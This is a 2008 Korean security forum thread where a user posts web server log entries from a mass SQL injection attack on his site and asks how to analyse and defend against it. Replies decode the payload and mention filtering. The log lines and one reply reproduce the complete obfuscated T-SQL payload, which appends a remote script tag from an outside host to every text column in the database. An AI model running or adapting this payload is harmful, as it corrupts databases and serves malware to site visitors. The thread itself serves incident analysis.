크래킹 피해

423,

3/22

youngman0707

sql인젝션문제인데요...코드분석점 부탁드립니다..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=382 [복사]

%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0 - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
'%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0%20AnD%20''=' - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
%25'%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0%20And%20'%25'=' - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F732E6361776A622E636F6D2F732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);-- - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
';dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F732E6361776A622E636F6D2F732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);-- - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
%25'%20;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F732E6361776A622E636F6D2F732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);--%20aNd%20'%25'=

Hit : 3761 Date : 2008/11/10 03:27


youngman0707	제가 지식이얕아서 ..이런거발생했을때..어떻게 분석..그리고 보안해야되는지 ..고수님들의 잡다한 한말씁부탁드립니다.. 잡다한 한말씁이 저에겐 큰힘이됩니다.. 오늘도 즐거운 하루보내세요..	2008/11/10
초딩해커	훔.. 횽아 참 험난하구나.. 횽 php좀 할줄알아? <? echo(urldecode("$str")); ?> 위 이상한 문자열을 요기 $str 인자로 전달하면 좀 마음이 안정될꼬야	2008/11/10
pr0sp3r	헤더부분은 날리고 실제 공격 쿼리는 0x부터 헥사값변조후 urndecode 하면아래와 같이 됩니다.<br /> <br /> %' ;dEcLaRe @S VaRcHaR(4000) SeT @s=DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE [' @T '] SET [' @C ']=RTRIM(CONVERT(VARCHAR(4000),[' @C '])) ''<script src=http://s.cawjb.com/s.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Curso aS VaRcHaR(4000));eXeC(@s);-- aNd '%'=	2008/11/11
k1rha	요즘 이코드 정말 자주보게 되네요 ㅋㅋ mass sql injection 공격인데요, 실제로 방어법은 원천적으로 sql injection 방어법과 같습니다만, mass sql 의 화두가 된이유는 IDS IPS 를 우회 할수 있다는 점입니다. 이점을 비롯해 방어법을 설명드리자면 필터링 구문에 mass sql 만의 구문을 필터링 해주면 된다고 하더군요 ...	2008/11/14